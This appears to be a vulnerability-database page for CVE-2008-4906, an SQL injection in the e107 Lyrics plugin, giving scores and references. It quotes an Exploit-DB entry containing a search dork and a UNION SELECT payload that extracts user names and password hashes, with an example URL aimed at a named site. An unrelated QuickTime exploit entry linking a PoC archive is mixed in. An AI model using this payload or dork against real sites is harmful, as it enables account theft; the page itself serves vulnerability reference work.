CVE-2008-4906
published 2008-11-04CVE-2008-4906: SQL injection vulnerability in lyrics_song.php in the Lyrics (lyrics_menu) plugin 0.42 for e107 allows remote attackers to execute arbitrary SQL commands via…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.15%
62.7th percentile
SQL injection vulnerability in lyrics_song.php in the Lyrics (lyrics_menu) plugin 0.42 for e107 allows remote attackers to execute arbitrary SQL commands via the l_id parameter. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| w1n78 | lyrics | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
e107 Plugin lyrics_menu - 'l_id' SQL Injection
exploitdb·2008-10-31
CVE-2008-4906 e107 Plugin lyrics_menu - 'l_id' SQL Injection
e107 Plugin lyrics_menu - 'l_id' SQL Injection
---
e107 Plugin lyrics_menu lyrics_song.php (l_id) Remote Sql inj
author: ZoRLu
home: z0rlu.blogspot.com
concat: [email protected]
date: 30/10/2008 ( saat 23:36 the_k@m!l'lerdeyim a.q :) )
n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
n0te: a.q kpss : ) )
dork: allinurl:"lyrics_menu/lyrics_song.php?l_id="
exploit:
http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2]
[SQL1] = column number 15
-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user--
example 1:
http://www.mirage.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_user--
[SQL2] = column number 17
-1+
Exploit-DB
QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow
exploitdb·2008-01-14
CVE-2008-0234 QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow
QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow
---
Quicktime Player 7.3.1.70 rtsp Remote Buffer Overflow Exploit PoC
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4906.zip (2008-quicktimebof.zip)
# milw0rm.com [2008-01-14]
No writeups or analysis indexed.
http://secunia.com/advisories/32477http://securityreason.com/securityalert/4551http://www.securityfocus.com/bid/32004http://z0rlu.blogspot.com/2008/10/e107-plugin-lyricsmenu-lyricssongphp.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/46236https://www.exploit-db.com/exploits/6885http://secunia.com/advisories/32477http://securityreason.com/securityalert/4551http://www.securityfocus.com/bid/32004http://z0rlu.blogspot.com/2008/10/e107-plugin-lyricsmenu-lyricssongphp.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/46236https://www.exploit-db.com/exploits/6885
2008-11-04
Published